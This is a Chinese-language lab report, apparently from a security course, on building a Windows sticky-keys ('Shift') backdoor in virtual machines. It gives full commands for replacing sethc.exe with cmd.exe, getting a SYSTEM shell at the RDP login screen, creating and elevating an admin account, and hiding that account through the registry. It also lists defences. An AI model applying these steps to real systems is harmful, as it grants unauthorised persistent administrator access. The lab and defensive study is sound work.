|
一、實驗目的及要求 1. 學會創建Shift後門 2.掌握shift後門的原理
二、實驗設備(環境)及要求 PC機, VC++等,虛擬雲平臺 三、實驗內容與步驟 1.在192.168.1.3的虛擬機上打開cmd命令指示符; 2.輸入“ cd c:\WINDOWS\system32”,進入該文件夾; 3.輸入“move sethc.exe sethc.exe.bak”,對“sethc.exe”進行備份; 4.輸入“copy cmd.exe sethc.exe”,對cmd.exe進行復制並更名爲“sethc.exe”; 5.打開控制面板-> 輔助功能選項->勾選“使用粘滯鍵”,點擊應用; 6.打開192.168.1.2的虛擬機,打開運行,輸入“mstsc”打開遠程登錄程序; 7.輸入“192.168.1.3”,點擊連接; 8.當出現登錄界面時,按5下shift鍵可進入目標機的cmd中; 9.在cmd中輸入“net user hack 123 /add”,創建用戶; 10.接下來輸入“net localgroup administrators hack /add”和“net user hack /active:yes”,對hack用戶進行提權和激活; 11.用hack用戶登錄目標機。
四、實驗結果與數據處理 1.對192.168.1.3的虛擬機的命令操作
2.使用粘滯鍵
3.用192.168.1.2的虛擬機遠程登錄192.168.1.3的虛擬機時,創建用戶。並對其進行提權和激活
4.成功登錄目標機
五、分析與討論 1.本實驗是利用在應用“使用粘滯鍵”後,windows系統在按5次shift後會調用“sethc.exe”應用程序的原理,將cmd.exe複製並更名爲“sethc.exe”,然後替換掉原有的sethc.exe文件,這樣在登陸界面的時候我們連續按下5吃shift鍵系統就會運行cmd.exe,這樣我們就可以對目標機進行創建用戶,對用戶進行相關提權和激活,從而進入目標機。 2.防範措施: (1)禁用shift鍵的粘滯功能; (2)設置權限,讓任何用戶都無法訪問和修改“sethc.exe”文件。 3.如何創建隱藏用戶: 創建用戶後,按win+r,輸入regedit回車,把註冊表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在裏面創建一個dword值,命名爲你要隱藏的用戶名,數值0。 |
